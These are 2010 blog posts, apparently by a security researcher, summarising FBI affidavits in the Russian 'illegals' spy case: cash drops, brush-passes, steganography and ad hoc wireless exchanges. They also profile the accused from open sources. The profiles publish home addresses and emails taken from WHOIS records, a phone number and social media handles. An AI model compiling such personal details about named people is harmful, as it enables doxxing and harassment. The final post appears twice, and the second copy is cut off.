Wednesday, June 30, 2010

Russian Spies - Tradecraft and Follow the Money

There are two documents that have been made public which consist of most of the "official" information about this week's Russian Spy cases. We reviewed the first of these documents, a deposition by FBI Special Agent Amit Kachhia-Patel, in our article Tuesday, on Anna Chapman and Mikhail Semenko. Wednesday morning we took an "Unofficial" look at the Four Russian Spy Couples (& Two Solo Acts) constructing bits of information about them from Internet-based records and the media.

In this post we'll be focusing on the longer deposition of FBI Special Agent Maria L. Ricci, who lays out the case against eight defendants before the Honorable James L. Cott, US Magistrate Judge, Southern District of New York.

Christopher R. Metsos
Richard Murphy
Cynthia Murphy
Donald Howard Heathfield
Tracey Lee Ann Foley
Michael Zottoli
Patricia Mills
Juan Lazaro
Vicky Pelaez

The charges are still primarily "Conspiracy to Act as Unregistered Agents of a Foreign Government", which is a violation of Title 18 USC Section 951.

The thirty-seven pages of the deposition got a bit confusing, so I found it helpful to draw some pictures, and try to figure out how many conspiracies were documented within.

The Group of Five Spies





This diagram focuses on the "Seattle Conspirators", Michael Zottoli and Patricia Mills, and the "Hoboken Conspirators", Richard Murphy and Cynthia Murphy.

Bags of Money and Exchanged Packages



Christopher R. Metsos seems to be the only one who is actually being called an SVR agent in these documents. Metsos works directly for the Russian government, and likely has a salary and a pension. The "Illegals", as the other eight co-conspirators are named, are citizens who work "unofficially" to gather intelligence and perform tasks at the direction of their handler. Metsos met Richard Murphy at least four times between February 2001 and April 2005. On March 31, 2002, Metsos brought a bag of money, likely $40,000 to the meeting, and Murphy left with the bag. By April 17, 2005 he chose to give him an ATM card with matching identification and a PIN number rather than large sacks of cash.

Metsos is observed on video doing a "Brush-pass", where two travelers with identical bags exchange bags while bumping into each other, crossing each other, or sitting beside one another without speaking. One of these brush passes is the only link to Zottoli and Mills, but there is a long time between. On May 16, 2004, Metsos trades identical orange bags with "Russian Government Official #2" in a brush-pass on a stariwell at the Forest Hills Train Station on the Long Island Railroad. Metsos then proceeds to meet with Richard Murphy at the Sunnyside Restaurant. He passes Murphy the package, instructing him to take his cut and tell the guy he meets "Uncle Paul loves him". Two weeks later Zottoli and Mills fly from Seattle-Tacoma airport to Newark Airport, check in to the Manhattan Hotel, and on June 19, 2004 enter Central Park. Intercepted communications reveal they couldn't find one another, but the next day they do meet at a subway entrance near Columbus Circle. Zottoli leaves the meeting with a red museum gift shop bag he had not possessed before the meeting.

Two years later, Zottoli and Mills fly to JFK from SeaTac. This time they proceed to a location near the Forest Hills Train station, and dig up a package buried in 2004 on the day of the Brush-pass. They are observed filling several wallets and a money belt with money back at their hotel, where they are under video surveillance.

In 2009 a similar brush-pass is arranged at the North White Plains train station on Harlem Line. Intercepted electronic messages gave the plan, where to meet in a "dead zone" on a certain stairwell, where Barnes and Noble bags will be exchanged. It is believed Murphy received $300K from Russian Government Official #3, and passed half of the money to Zottoli, along with a flash memory card.

Murphy and Zottoli were given a script for positive identification:
"Excuse me, did we meet in Bangkok in April last year?"
"I don't know about April, but I was in Thailand in May of that year."

The second half of the pass happened on a park bench in Fort Greene Park in Brooklyn. Electronic comms intercepted after the meeting reported "Meeting with M was successful. A passed to M the card and $150k."

Murphy met with other SVR agents to receive an Irish passport in the name of Doherty Eunan Gerard and money and tickets for travel. In January 2010 Murphy received instructions to purchase computer equipment and take it to the Moscow Center. He traveled to Europe with the laptop, and after returning met once more with Michael Zottoli at a coffee shop in Brooklyn and passed him the laptop, two memory sticks, and $9,000 cash, according to intercepted electronic records.

Electronic Tradecraft & Taskings


In addition to the typical "package exchange" tradecraft, there is significant evidence of sophisticated electronic tradecraft as well.

On July 27, 2005, the FBI conducted a search of the Hoboken, New Jersey residence of Richard & Cynthia Murphy. During the search, they uncovered a 27-character long password written on a piece of paper near the computer, beginning with "ctrl alt e".

The password turned out to be the key to unlocking a secret steganography program located among their disks. Also on the computer in their apartment, an address book was found indicating "hundreds of websites" where photos could be uploaded. According to court documents, these websites were reviewed and more than 100 images were discovered which actually contained text files hidden within the images.

Although I am well familiar with the concept of steganography - hiding a text message inside the "noisy bits" of a graphic file - I was only aware of one "in the wild" story of steganography before this case. In fact, I frequently ask the question when various professionals mention steg if they have ever seen it "in the wild". Only one person so far has answered me in the affirmative with a credible story - Dorothy Denning of the Naval Post-Graduate School, speaking at a cybercrime meeting at UNC Charlotte - with a case involving stolen credit cards hidden in graphical bullets on a website. This would be the second case of which I am aware. All of the other "scary stories" about steganography I have heard have proven to be unfounded.

Another case of electronics was the shortwave radio found in the Seattle search of Zottoli and Mills apartment February 17, 2006. In that case, a spiral-bound notebook of "radiograms", short coded groups of letters was found written beside the shortwave. Several of the couples, including Boston and New Jersey, were observed to reserve electronic messages referring to "RGs" or RadioGrams. In January 2009, a message to New Jersey read "Pls, make sure your radioequipment for RG rcptn is in order. We plan to send a couple of test Rgs." Pelaez and Lazaro were also overheard in surveillance discussing "receiving radio from over there."

Some of the decoded messages to the New Jersey conspirators gave specific taskings, or "infotasks". For example, in the spring of 2009 - SVR requested information prior to Obama's visit to Russia, any information on the US position with respect to a new Strategic Arms Limitation Treaty, Afghanistan, or Iran's nuclear program. Specific sub-cabinet officials were named from which information should be tried to be gained. It wasn't necessarily classified information that was being sought - in one message of October 18, Moscow instructs "to send more info on current international affairs vital for R, highlighting US approach and providing us w. comments made by local expert (political, economic) scientist's community. Try to single out tidbits unknown publicly but revealed in private by sources close to State department, Government, major think tanks."

As I revealed in yesterday's blog story, Four Russian Spy Couples and Two Solo Acts, those arrested had many important contacts through well-chosen schools and carefully selected career options to put them near these types of people. As Richard Murphy was contemplating how to improve his collection, he was warned by Moscow Center to avoid directly seeking government jobs, because his legend was not strong enough to pass a full government level background check.


One "job well done" message was sent back to Cynthia Murphy after she shared some closely held information regarding the global gold market. SVR responded "Info on gold v. usefull, it was sent directly to Min of Finance, Min of Ec Devel."

Intercepts to and from Murphy provide further insights. She was urged to strengthen relationships with classmates and professors who may be able to help with introductions or who may work with secret data. If she became aware of a potential information source, she was to pass the data to SVR, who would instruct her to proceed ("the target is clean") or hold back ("the target is dirty"). She was given a "clean target" report about one of her financial firm's clients, who has been since revealed in the media to be Alan Patrickof, a Hillary Clinton financier. Even "White House kitchen" gossip would make for interesting reports, and she was encouraged to try to get invitations from Patrickof to events such as Democratic Party conventions.

Murphy was also tasked to seek out particular classmates who may apply for jobs with the CIA. (Murphy has an International Business Degree from NYU's Stern School of Business, and an MBA from Columbia.) After many years with the same firm, in 2010 Moscow Center began pushing for Murphy to consider a job with a lobbying firm that would increase her access to US government sources.


The Other Couples



Juan Lazaro and Vicky Pelaez don't seem to have a clear link that I could see in the court record with the other couples or with Metsos. The primary activities documented regarding these two are money movement. At least two South American money transfers occurred involving the receipt of funds from Russian government representatives. On January 14, 2000, Pelaez received funds while under video surveillance at a park in a South American country. A telephone intercept confirms that Pelaez told Lazaro that same day that "all went well." Lazaro would later meet "Russian Government Official #1" at the same park on August 25, 2007, with the exchange again being videotaped. Lazaro waited at a park bench with an open shopping bag at his feet. RG#1 placed a smaller plastic bag into Lazaro's shopping bag, and the two parted ways. When Lazaro returned home he paid $8,000 in taxes almost immediately.

On January 8, 2003 the couple reports that Lazaro is writing a report "in invisible" in a notebook, and that while Pelaez is in South America she will pass the book to contacts there. This is believed to be a reference to invisible ink. After one of Pelaez's trips she returns with "eight bags of ten" and the two are heard counting money on surveillance, determining they actually had $76,000. Other conversations recorded at their residence made it clear they were being paid to provide information. One exchange is shared in the deposition where their handlers are complaining that some facts do not indicate their source, and that this makes them worthless. Pelaez replies to her husband "Then why do they have you? If they don't care about the country, what do we have Intelligence Services for?" Most of the intercepts from this couple are from 2002 and 2003.


One of the only things that ties the Boston conspirators, Donald Howard Heathfield and Ann Foley, to the others is their common technology. As mentioned above, the New Jersey search warrant found secret steganography software, developed by the SVR, that was only accessible if a particular 27 character password was entered. The same software, also only accessible by entering a 27 character password, was also found on their Boston computer after a search of their home on July 29, 2006. In that same search, a number of deleted files were recovered from their computer, including files that were obviously the draft messages which had been included in image files and posted online for retrieval by SVR. Aural communication intercepts of the couple at home also reveal that they were using the steganography, included one intercept shared in the deposition from March 7, 2010, where Foley and Heathfield are discussing whether they were allowed to place two messages in the same image.

In several of the intercepts, it is revealed that Donald (who is referred to as "Dv" by Moscow Center) has established contact with a former high-ranking US Government national security official whose name is provided. He also relays conversations about the capabilities and strategic planning for "small yield high penetration nuclear warheads" called bunker-busters. His infosources were given codenames such as "Farmer", "Parrot", and "Cat". Sometimes he was encouraged to proceed. Other times he was asked for more details about work position, background, habits, contacts, etc in order to determine whether the target was worthwhile to pursue.

Foley is elsewhere provided with a fraudulent British passport, a flight itinerary, and an invitation from the Russian Chamber of Commerce to visit Moscow.

At this point, it is not obvious from the published documents how Pelaez and Lazaro can be linked to the others in the public documents. One may speculate that the link is from common handlers on the official Russian side which cannot be disclosed publicly at this time.

Tuesday, June 29, 2010

Four Russian Spy couples (& two Solo Acts)

In yesterday's blog post, Anna Chapman and Mikhail Semenko vs. FBI we looked at the Wireless Ad Hoc networks that are now part of SVR tradecraft. We'll look at the tradecraft in the rest of the case tomorrow, but for today we ask "Who are these people?"


Donald Heathfield & Ann Foley - Boston



Donald Howard Heathfield and Tracey Lee Ann Foley were a couple in Boston, Massachusetts. They lived at 111 Trowbridge St., apartment number 9, in Cambridge, according to this piece from WBZ Boston. The FBI became suspicious of Donald, who was believed to be French Canadian, and spent much of his time in France and Europe, when they learned in 2005 that he was dead. The real Donald Howard Heathfield, who was Canadian, had died in 2000.

His "wife", who went by the name "Ann Foley" dabbled in real estate, according to this Boston.com profile. Boston.com interviewed her boss at a Boston real estate company, Redfin Corporation. Ann had her own web address, "foleyann.com", which was part of the RedFin website.

Don's LinkedIn page says he was the CEO of a company called FutureMap. (He's a "3rd level" link of mine, through 9 different connections). His LinkedIn also lists his MBA in Paris and his Masters in Public Administration from the Kennedy School of Government at Harvard University. He worked after graduating there at Global Partners in Boston for six years before starting Future Map.

His LinkedIn Group memberships include:

* Oxford Futures Forum
* Society of Competitive Intelligence Professionals
* World Future Society
* Predictors logo Predictors
* Selling in the New Global Economy logo
* Harvard University, John F. Kennedy School of Government (HKS)
* Harvard China Group
* US Policy on China & the Rest of the World Group
* Business Intelligence Group
* Private Sector Preparedness
* IVY GROUPS - The Professional Network for Ivy League Alumni
* Strategic Business and Competitive Intelligence Professionals
* IVY GROUPS: Management Consulting & Professional Services
* Public Sector Innovation
* Public Sector Consultants
* U.S. Government Relations & Public Affairs
* SOFT POWER NETWORK
* National Emergency Management Resource Center [NEMRC]
* Pharma Market Research
* World Future Society
* HFMA CFO Forum
* Business Intelligence Professionals
* Public Sector Forum
* Public Sector Risk Management
* Global Insurance Professionals
* IVY GROUPS: Government & International Affairs
* State & Federal Public Sector Professionals
* Professional Public Service: MPA-MPP Degrees
* Balanced Scorecard Practitioners Global Network
* Association for Strategic Planning
* China Business
* Web 2.0

The WHOIS information for Ann's domain confirms her address, and the email used, "dh@thefuturemap.com", is consistent with her husband's listed email address.


Registrant:
Tracey Ann Foley
111 Trowbridge St.
Unit 9
Cambridge, Massachusetts 02138
United States
dh@thefuturemap.com

Domain Name: FOLEYANN.COM
Created on: 27-Sep-07
Expires on: 27-Sep-10
Last Updated on: 26-Aug-08

His website uses different contact information, including a hotmail email account:

Donald Heathfield
111 Trowbridge St.
#9
Cambridge, Massachusetts 02138
United States
dheathfield@hotmail.com

Domain Name: THEFUTUREMAP.COM
Created on: 12-Jan-05
Expires on: 12-Jan-11
Last Updated on: 13-Jan-10


His website, thefuturemap.com, gives a mission statement:

Future Map enables governments and businesses to develop comprehensive preparedness systems and build a culture of strategic proactivity and anticipatory leadership.


According to his website, the company's feature project was currently a joint effort with the Beijing Academy of Soft Technologies and the Chinese Academy of Social Sciences, called "Green China". They maintained a "ning" site for the project at ChinaGreenFuture.ning.com


Her website provides this bio:

Ann Foley, a native of Montreal, lived and was educated in Switzerland, Canada and France. Prior to her career in real estate she worked as a Human Resources officer in Toronto and ran her own travel agency in Cambridge that specialized in organizing trips to French wine regions for small groups of enthusiasts. Ann’s cultural awareness and international experience make her sensitive to the needs of other people. She strives for excellence in everything she does. Ann succeeds through her ability to ensure quality service, honesty and integrity. You will appreciate Ann’s enthusiasm and commitment to make sure that your real estate goal becomes a reality.

Ann resides in Cambridge with her husband and two teenage sons. She and her family are fond of travel. They have enjoyed visiting much of Europe but are particularly in love with Asia. Ann also appreciates gourmet food, ballet and spending time with her children


Mikhail Semenko - Washington DC


According to Mikhail's LinkedIn Page, he currently works for "Travel All Russia, LLC", which is a company that "Sell customized tours to English, Spanish and Chinese speaking clients. Establish connections with business partners in China and Latin America. Design new tours and business expansion initiatives."

If one of the goals was to find spies who could influence policies, the rest of Mikhail's resume looks like he might have been a rising star!

Before his current travel position he was a "Council Coordinator" for the The Conference Board: Trusted Insights for Business Worldwide, where his responsibilities are given as:

Coordinated with researchers and program directors to develop, support and operate five councils of senior executives. Enhanced member engagement and promote networking, research and exchange of new ideas among senior corporate executives. Identified, developed and implemented membership recruitment initiatives.


While working as a graduate student at Seton Hall University, his responsibilities as an intern included "File purchase orders, invoices and related accounting paperwork. Track, file and report on faculty stipends." He was an Intern at the World Affairs Council in 2007, and taught English and Western culture to students at the "Harbin Nangang District Language Center" while studying Chinese language and culture himself as a student at the Harbin Institute of Technology from 2003 to 2005. Harbin is in the extreme NorthEast corner of China.

Mikhael uses his voice as a blogger to decry US Policy in China. His blog post from June 24th begins with ... "I’m amazed at the persistence, with which American policymakers keep blaming China for its economic vows. Meanwhile, we finally received a response to US’s continuing whining about undervalued Renminbi from the China’s Foreign Ministry: “We believe the appreciation of the renminbi cannot bring about balanced trade and cannot help the U.S. solve its own problems of unemployment, overconsumption and a low savings rate”.

According to his blog, Mikhail can be reached at msemenko@gmail.com or on his cell at 973-489-2297 begin_of_the_skype_highlighting              973-489-2297      end_of_the_skype_highlighting. http://chinaeconomytoday.wordpress.com/contact-me/

That's the same contact email he uses on "forums.amur.info", a Russian hang-out spot where he calls himself "mike_newyork". That's similar to his Twitter ID, http://twitter.com/mike_nuevayork.


While finishing his Masters at Seton Hall, his research projects included "China's Energy Policy in the Arab World" and "China-Taiwan Relations". As an undergrad in International relations at Amurskij Gosudarstvennyj Universitet, he was a leader in the "Model United Nations" focusing on Far East relations.

He networks well on LinkedIn. He's a "3rd level" connection to me through five different connections.

His LinkedIn Groups included:
* Carnegie Council for Ethics in International Policy, Asia Society
* Whitehead Alumni Association
* China Business Consultants Network
* Consultants Network Consultants Network
* Procurement Professionals (#1 supply chain & sourcing group) Business, network, jobs & candidates
* Seton Hall University Alumni Network
* Friends of China
* Overseas Chinese Network
* Hotel Industry Professionals Worldwide
* BRIC
* China HR Network (1000+)
* Friend of China
* Chinese-Speaking & China-Experienced Business Executives
* Public Policy Network - International
* Friends of Chinglish
* Non Profit & Philanthropic Job Board
* MENA Private Equity and Venture Capital Group
* US Policy on China & the Rest of the World Group
* The Green Leap Forward 绿跃进
* Doing Business & Expanding into China
* JOBS 2.0: Job Search Career Networking Staffing.
* Global Jobs Network
* España economía en crisis, Macroeconomía de otros países
* JOBS 2.0 Northeast (Northeastern US): New York City Philadelphia Boston Pittsburgh Hartford Buffalo
* JOBS 2.0 in Asia – Japan Hong Kong Taiwan South Korea China Russia India Pakistan Malaysia Thailand
* eyeforpharma Sales Force Effectiveness
* Innovation Works (China)
* Top SEO
* TRAVELALLRUSSIA

Anna Chapman - Manhattan


Anna Chapman is the celebrity of the group and has been much covered elsewhere. I did point out in Yesterday's Entry that she was interviewed about her "TIME Ventures" fund. TIME, the acronym stolen from a Canadian company of the same name, stands for "Technology, Internet, Media, Entertainment" had a bankroll of $2 Million to help other Russian entrepreneurs establish companies in New York.

Her Facebook Page says she has 168 friends, and is interested in "Alma De Agave Tequila, New York Entrepreneur Week, Do It In Person, AMBAR, MostProperties.com, School of Academic and Professional Blogging". Anya has her Facebook privacy settings set to make her "Wall" public, so there is some interesting things there.

(AMBAR = American Business Association of Russian-speaking Professionals ( AmBAR ) is a non-profit business association of entrepreneurs, venture capitalists, engineers, lawyers and other professionals with headquarters in Silicon Valley.

She really did seem to be in the Russian Entrepreneur scene, with recent links such as:

Anna Chapman Ребята, всем кому интересно узнать про венчурное инвестирование, в Москве будет отличное мероприятие - Московский венчурный форум, участие бесплатное, информация на http://arip.ru/
Инновации, инновационные проекты, субсидии, инвестиции, поддержка

(Translated:
Anna Chapman guys, all who are interested to learn about venture investing, in Moscow will be a great event - the Moscow Venture Forum, part free of charge, information on http://arip.ru/
Innovation, innovation projects, grants, investments, support


She also attended New York Entrepreneur Week cocktail reception back on April 15th.

A bit of her poetic musings: "Anna Chapman In the midst of winter, I finally learned that there was in me an invincible summer.
April 8 at 6:52am"

And a post about her Mac, the focus of her "spy" activities: "Anna Chapman My new Mac has been the buy of the year... Love it!
January 24 at 6:11pm"

OK - this is the part where my teenage daughter would accuse me of being a Facebook creeper...moving on.

Vicky Pelaez and Juan Lazaro - Yonkers



Vicky Pelaez, Spanish-language journalist, profiled in the New York Daily News. In 1984 she was kidnapped in Peru by the MRTA, but her cameraman at the time claimed she was a willing accomplice of the kidnappers. She lived with her Peruvian husband and fellow accused spy, Juan Lazaro, at a home in Yonkers, New York. In this photo from 1010WINS.com, FBI agents are entering their property: They have a 38 year old son, named Waldo Mariscal.

Vicky used her New York based "El Diario" email, Vicky.pelaez@eldiariony.com, in her byline for recent stories, including:

June 1, 2010 - El derrame de petróleo es la ‘Katrina’ de Obama - (the Oil Spill is Obama's Katrina)

May 25, 2010 - Obama campeón deportador de indocumentados - (Obama is the champion of the undocumented) - mocks our government as being racist, xenophobic, and intolerant and starts with the Thomas Aquinas quote: "Justice without mercy is cruelty"

May 4, 2010 - Arizona: un 'muerto de hambre' con ínfulas - compares the Arizona immigration law with Nazi Germany and Apartheid, and quotes FDR (in Spanish) "“Acuérdate, acuérdate siempre, que todos nosotros somos descendientes de inmigrantes y revolucionarios”." (Remember, always remember, that all of us are the descendants of immigrants and revolutionaries)

Juan Lazaro is mentioned in today's New York Times article, Curiosities Emerge in Suspected Russian Spy Ring by James Barron, because former students of his at Baruch College remember his anti-American views. He taught as an adjunct for a single semester only. Here's how the NYT relays student views:

His students said he was a professor like none other. The reason? His passionate denunciation of American foreign policy. He maintained that the wars in Iraq and Afghanistan were a money-making ploy for corporate America. He praised President Hugo Chávez of Venezuela and disparaged President Álvaro Uribe of Colombia as a pawn for paramilitary groups that have broad control over drug trafficking.

“He challenged us intellectually,” said one student who graduated in May. “He criticized a lot about what happens in the United States, and that’s what I think got some people upset.”


The course catalog entry reads:

CUNY Bernard M Baruch College
POL 3364 - Lat Am&carib Pol Sys

This course examines contemporary political systems in selected Latin American and Caribbean countries. It emphasizes the common problems of state-building, political-economic development, political party development, political instability, revolution, dictatorship, and democracy in these nations. Special attention is paid to the current and historical relations between these countries and the United States and other nations in the hemisphere.


Michael Zottoli and Patricia Mills - Arlington, Virginia



Michael Zottoli, 40, and Patricia Mills, 31, lived together in an Arlington, Virginia apartment. According to this profile by KATU, the couple lived in five different apartments in Seattle, Washington between 2002 and October, 2009. Zottolli claims to be born in Yonkers, New York, although he may have entered the country as late as 2001. Mills claims to be a Canadian citizen who has lived in the US since 2003. They have at least two children, according to a former landlord.

Zottoli and Mills were students at the University of Washington, according to this Seattle Times piece by Jonathan Martin and Christine Willmsen, which says they were married in King County in 2005 and graduated with degrees in business in 2006. Although both have social security cards, the number on Mills' card belongs to someone else. After working briefly as a car salesman, Zottolli was hired in July of 2007 by "Link Conference Services". (His LinkedIn page lists him as a "senior accountant" there from July 2007 to September 2009.) He left that job telling his boss he was going to take a "six month vacation" to visit Mills parents in South Africa. Patricia told their landlord they were going to Europe. The landlord recalls they were "all about Kenny", their toddler. Zottolli's former boss says she received a reference check from a nursing home in Arlington who was interviewing him to be an accountant.

Richard Murphy and Cynthia Murphy - New Jersey


Richard and Cynthia Murphy, pictured here in a
photo obtained by the New York Daily News had a long profile published in NorthJersey.com with long interviews by several neighbors, who described Richard as "anti-social" and said they told confusing stories about their origins. Cynthia claimed to be from Toronto, but didn't recognize the name of a prominent subdivision where one neighbor had family.

We don't know a lot about Richard yet. He traveled to Russia recently on a fake Irish passport under the name of "Eunan Doherty"

Cynthia worked at Morea Financial Services, at 120 Broadway in New York, and had recently completed an MBA from Columbia University in May, with her undergrad from the Stern School of Business in 2000. Various media sources say that one of the firm's clients was Alan Patrickof, a Hillary Clinton fund-raiser who may have been mentioned in dispatches back to Russia. Patrickof says although the two have talked, their conversation was strictly about taxes.

Cynthia is actually in my LinkedIn network at the 3rd level, although she calls herself "Cindy Murphy" there. Her profile says she has been at Morea Financial Services since 1997 and that she is a "Certified Financial Planner." Three of my connections (one in Boston, one in Toronto, one in New York) have "links" who are "linked" with Cynthia. Small world!


Cyrillic spellings


For those Googling by Russian/Cyrillic spellings, they are listed here under the Cyrillic spellings of their names, with the text from a story in Izvestia.ru:

Согласно изложенным Минюстом США сведениям, в городе Монтклэр (штат Нью-Джерси) были задержаны Ричард и Синтия Мерфи; в Йонкерсе (штат Нью-Йорк) - Вики Пелаэз и Хуан Лазаро; в Нью-Йорке на Манхэттене – Анна Чэпмен; Майкл Зоттоли и Патриша Миллз, а также Михаил Семенко – в Арлингтоне (штат Вирджиния); Дональд Говард Хитфилд и Трейси Ли-Энн Фоли - в Бостоне (штат Массачусетс). Речь идет во всех случаях, кроме Чэпмен и Семенко, о супружеских парах. В розыск по данному делу объявлен его одиннадцатый фигурант – некий Кристофер Метсос.

(Translated via Google Translate:

According to the U.S. Justice Department set out the information in the city Montkler (New Jersey) were arrested Richard and Cynthia Murphy, in Yonkers (NY) - Vicky Pelaez and Juan Lazaro, in New York in Manhattan - Anna Chapman, and Michael Zottoli Patricia Mills, and Michael Semenko - in Arlington (Virginia), Donald Howard Heatfield and Tracy Lee-Ann Foley - Boston (Massachusetts). Речь идет во всех случаях, кроме Чэпмен и Семенко, о супружеских парах. It is in all cases except Chapman and Semenko, about couples. A search in the case has been announced for an eleventh person involved - a Christopher Metsos.

Anna Chapman and Mikhail Semenko vs. the FBI: Wireless Ad Hoc Networks and the SVR

The warrant for the arrest of Anna Chapman and Mikhail Semenko has been said to read "like a John LeCarre novel". Much has been made of 28 year old Anna Chapman, who is variously headlined as "Anna Chapman: Hot Russian Spy", "Flame-haired beauty", and "Glamorous Anna Chapman" in today's news stories. You can search for those elsewhere, though I suppose my favorite picture of her so far is this one that MSNBC found on her Odnoklassniki page (the Russian version of Classmates.com?): (click image for MSNBC story)

Here is an interview, in Russian, with a young entrepreneur named "Анной Чапман" (Anna Chapman) who has started a venture fund called "TIME Ventures" for Russian entrepreneurs in New York. Interesting . . .

(Click for YouTube video)


Here the only thing we'll be peeking at are the facts laid out in the warrant. Tomorrow we'll look at the other nine "illegals".

From the Warrant:

Violation of 18 USC § 371

Anna Chapman
Mikhail Semenko

From the 1990s until the present the defendants "did combine, conspire, confederate, and agree with each other to commit an offense against the US to violate section 951 of Title 18.

They acted as agents of a foreign government, the Russian Federation, including:

- June 26, 2010 - Anna Chapman met with a Russian government official in Manhattan from which she received a fraudulent passport.

- June 26, 2010 - Mikhail Semenko met with a Russian government official in Washington DC.

The "Illegals" Program



The FBI has conducted a multi-year investigation of a network
of US-based agents of the foreign intelligence organ of the
Russian Federation (the "SVR").

There are two types of SVR agents, which the Bureau refers to as "Illegals". The first type are SVR agents who have assumed false
identities, and lived in the US under the direction and control of the SVR. They receive extensive training in various forms of "tradecraft", including:
agent-to-agent communications
invisible writing
use of a cover profession

The SVR also maintains a network of illegals who do similar work but operate under their true names. This network of illegals are trained in the same trade-craft of the others, but receive shorter training in tradecraft. While the "false identity" illegals are usually paired together as part of their cover, the "true identity" illegals usually work independently.

The goal of the "Illegals" is to have long-term agents who become sufficiently "Americanized" to gather information about the US for Russia, and to be able to recruit sources in, or possibly to infiltrate, US policy-making circles.

This was spelled out clearly in an intercepted and decrypted communication from Moscow to Anna and Mikhail, they were told:

You were sent to USA for long-term service trip. Your education, bank accounts, car, house etc. — all these serve one goal: fulfill your main mission, i. e. to search and develop ties in policymaking circles in US and send intels to C.




Means and Methods of the Conspiracy



The modern age has created new forms of "drops" not seen in the movies. One of these techniques is a private Wireless network. In this form of communication, the handler and the agent exchange MAC addresses for their laptop computers, and configure their machines so that they will create an encrypted network connection only if they see the MAC address of the Wireless network card of the other device.

Anna Chapman

Between January 2010 and June 2010, defendant Anna Chapman, on at least ten Wednesdays, entered the United Nations building in Manhattan and seated herself in order to exchange files with her Russian government handlers via this technique. Some other examples are given in the Affadavit that forms part of the complaint, including:

January 20, 2010 -- Anna Chapman enters a coffee shop on the corner of 47th street and 8th avenue in Manhattan. A minivan, being driven by unnamed Russian government official #1, pulled up to the curb outside the window, and created an "Ad Hoc" Wireless Network with Chapman's laptop, allowing them to communicate via an encrypted network.

March 17, 2010 -- Chapman enters a bookstore in the vicinity of Greenwich and Warren streets in Manhattan. While inside, Russian Government Official #1 was observed loitering outside the bookstore. Three minutes after Chapman powered on her laptop, the same MAC Address observed on January 20th created an Ad Hoc wireless network and data flowed between the devices for at least twenty minutes.

April 7, 2010 -- Russian Government Official #1 was observed leaving his office. Although the MAC Address for Chapman's laptop was observed in the vicinity, it is believed Russian Government Official #1 detected surveillance and aborted his attempts to contact Chapman.

Similar exchanges were observed on April 21, 2010, May 5, 2010, June 9, 2010, and June 16, 2010, on each time, the same pair of MAC addresses created an Ad Hoc private wireless network.

Mikhail Semenko

On June 5, 2010, Mikhail Semenko was seen entering a restaurant in DC, carrying a bag. Russian Government Official #2 arrived at the restaurant in a car with diplomatic license plates and sat in the car in the parking lot for twenty minutes before driving away. An Ad Hoc private wireless network was established shortly after the arrival of the car, and dismantled shortly after the departure of the car. It is believed that SEMENKO performed communications from a laptop in the bag he was carrying during this time.

(Russian Government Official #2 was involved with a "brush-pass", exchanging identical packages with a co-conspirator, back in 2004 at a train station in Forest Hills, New York.)

Anna Chapman gets an FBI Handler


On June 26, 2010, Anna Chapman met with an undercover FBI agent in Manhattan, who had arranged a meeting with her to discuss her "Wednesday" covert laptop sessions. Apparently Chapman had been having technical difficulties with her laptop, and the FBI took the opportunity to reach out to her, suggesting that she was ready "for the next step". Although the telephone calls with UnderCover-1 were in Russian, when they met in person, UC-1 suggested they speak in English "to not draw attention to themselves". A transcript of their conversation is part of the court documents.

UC-1 says that Chapman has done well with the laptop, but now it was time to the next step. The subject of her broken laptop came up in the course of conversation. UC-1 mentions that he would be happy to take it and have it repaired, or she can take it to the Consulate herself. Chapman told UC-1 "It would be more convenient if I gave you it." To avoid blowing cover, UC-1 continued with the task, which was providing a fake passport to Chapman which she was supposed to convey to another agent.

UC-1 tells her that she is to sit on a certain park bench, holding a magazine in a certain way. The other agent will approach and say "excuse me, but haven't we met in California last summer?" Chapman was to reply "No, I think it was the Hamptons," which would be the signal that everything was ok. The other person would then take the magazine, with the passport. If the pass was successful, Chapman was to return to a city map on an outside display and place a postage stamp on the map. That would be the way UC-1 would know everything went well.

An hour after this meeting, Chapman entered a CVS pharmacy, then a Verizon store, then went to a Rite Aid pharmacy, then back to the Verizon store. When she exited the Verizon store the second time, she discarded a bag. The receipts and packaging in the bag indicated she had bought a Motorola cell phone and a "TracFone" calling card. The customer agreement was for "Irine Kutsov" who lived at "99 Fake Street". She discarded the charger that came with the phone, indicating that she probably didn't intend to use it for more than that day.

Mikhail Semenko gets an FBI Handler



Using a very similar method, and on the same day, Semenko meets with an Undercover FBI Agent (UC-2). UC-2 also has a "next step" task for Semenko. He provides an envelope with $5,000 and a map indicating a drop spot beneath a bridge in a park in Arlington between 11 and 11:30 AM the following day. During the same conversation, UC-2 indicates that there were problems receiving the file from the Wireless network at the restaurant, and tries to elicit more information from Semenko about what the problem may have been. Semenko says that he did everything right - he made the file and zipped it - and the computer turned itself off after the file was sent, which is the sign that the transfer was successful.

Based on the information above, FBI Special Agent Amit Kachhia-Patel requests a warrant for the arrest of Chapman and Semenko, which was signed on June 27, 2010 by US Magistrate Judge, the Honorable Ronald L. Ellis, of the Southern District of New York.




For some interesting reading, flip up Google Translate and start following the Comments sections on some of the Russian coverage on this story:

http://www.ruformator.ru/news/article06934/default.asp

http://www.lenta.ru/lib/14206093/#4

Anna Chapman and Mikhail Semenko vs. the FBI: Wireless Ad Hoc Networks and the SVR

The warrant for the arrest of Anna Chapman and Mikhail Semenko has been said to read "like a John LeCarre novel". Much has been made of 28 year old Anna Chapman, who is variously headlined as "Anna Chapman: Hot Russian Spy", "Flame-haired beauty", and "Glamorous Anna Chapman" in today's news stories. You can search for those elsewhere, though I suppose my favorite picture of her so far is this one that MSNBC found on her Odnoklassniki page (the Russian version of Classmates.com?): (click image for MSNBC story)

Here is an interview, in Russian, with a young entrepreneur named "Анной Чапман" (Anna Chapman) who has started a venture fund called "TIME Ventures" for Russian entrepreneurs in New York. Interesting . . .

(Click for YouTube video)


Here the only thing we'll be peeking at are the facts laid out in the warrant. Tomorrow we'll look at the other nine "illegals".

From the Warrant:

Violation of 18 USC § 371

Anna Chapman
Mikhail Semenko

From the 1990s until the present the defendants "did combine, conspire, confederate, and agree with each other to commit an offense against the US to violate section 951 of Title 18.

They acted as agents of a foreign government, the Russian Federation, including:

- June 26, 2010 - Anna Chapman met with a Russian government official in Manhattan from which she received a fraudulent passport.

- June 26, 2010 - Mikhail Semenko met with a Russian government official in Washington DC.

The "Illegals" Program



The FBI has conducted a multi-year investigation of a network
of US-based agents of the foreign intelligence organ of the
Russian Federation (the "SVR").

There are two types of SVR agents, which the Bureau refers to as "Illegals". The first type are SVR agents who have assumed false
identities, and lived in the US under the direction and control of the SVR. They receive extensive training in various forms of "tradecraft", including:
agent-to-agent communications
invisible writing
use of a cover profession

